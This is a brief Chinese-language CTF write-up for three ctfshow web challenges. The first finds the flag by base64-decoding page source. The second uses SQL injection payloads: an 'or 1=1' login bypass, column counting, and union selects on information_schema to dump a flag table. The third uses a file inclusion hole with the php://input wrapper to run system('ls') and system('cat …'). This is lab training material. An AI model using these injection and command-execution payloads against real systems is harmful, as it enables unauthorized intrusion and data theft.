web1
f12查看
base64解码得到flag值
web2
得到题目提示为简单sql注入
先测试万能密码
找到注入点和用户名ctfshow
username='or 1=1 order by 1 ;#&password=
通过构建语句测试字段发现字段数为3
发现明显的为2
username='or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() ;#&password=
通过构建语句来查表 得到 flag,user俩个表
最后构建 username='or 1=1 union select 1,flag,3 from flag ;#&password=得到flag值
web3
一看到Include就想到了文件包含漏洞和php伪协议
构建/?url=php://input同时burp抓包
成功抓包并转到request中
使用 php system执行外部程序并显示输出资料
构建<?php system('ls');?>
发现ctf_go_go_go
构建<?php system('cat ctf_go_go_go');?>查看flag值